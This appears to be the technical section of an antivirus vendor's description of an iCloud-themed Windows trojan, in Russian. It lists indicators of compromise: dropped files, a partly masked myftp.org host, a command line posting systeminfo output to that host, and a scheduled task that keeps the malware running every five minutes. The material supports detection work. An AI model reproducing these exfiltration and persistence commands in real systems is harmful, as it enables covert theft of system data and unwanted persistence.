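Техническая информация
Список ниже объединяет индикаторы разных типов: завершаемые процессы, создаваемые файлы, сетевые обращения и запускаемые командные строки. Символы #### в имени хоста, по-видимому, скрывают часть домена.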
- '<SYSTEM32>\taskkill.exe' /f /im IcloudSetup.exe
- '<SYSTEM32>\taskkill.exe' /f /im IcloudMonitor.exe
- %TEMP%\7ZipSfx.000\iclouds.cmd
- %TEMP%\7ZipSfx.000\ipad.system
- %TEMP%\7ZipSfx.000\IcloudSecurity.lnk
- %HOMEPATH%\IcloudSecurity\Icloud.exe
- %TEMP%\7ZipSfx.001\icloud.cmd
- %TEMP%\7ZipSfx.001\IcloudSetup.exe
- %TEMP%\7ZipSfx.001\Security_icloud.ini
- %HOMEPATH%\IcloudSecurity\Security_icloud.ini
- %TEMP%\7ZipSfx.001\system32.ini
- %TEMP%\7ZipSfx.001\icloud.exe
- 'ar####rt.myftp.org':80
- http://ar####rt.myftp.org/
- DNS ASK ar####rt.myftp.org
- ClassName: '' WindowName: ''
- '%HOMEPATH%\IcloudSecurity\Icloud.exe'
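- '%TEMP%\7ZipSfx.001\IcloudSetup.exe' --post-data="comp=CRNJEUFU&id=20.04_CRNJEUFU_ECHOisoff.&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: ...
  (аргумент --post-data содержит имя компьютера и, судя по формату полей, вывод systeminfo; по-видимому, эти сведения о системе отправляются на удалённый сервер; строка на странице обрезана)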
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\iclouds.cmd" "
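- '<SYSTEM32>\schtasks.exe' /Create /sc MINUTE /mo 5 /f /tn Icloud /tr "%HOMEPATH%\IcloudSecurity\Icloud.exe"
  (закрепление в системе: задача планировщика «Icloud» создаётся с перезаписью существующей (/f) и запускает Icloud.exe каждые 5 минут; наличие такой задачи — удобный признак для обнаружения)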
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.001\icloud.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'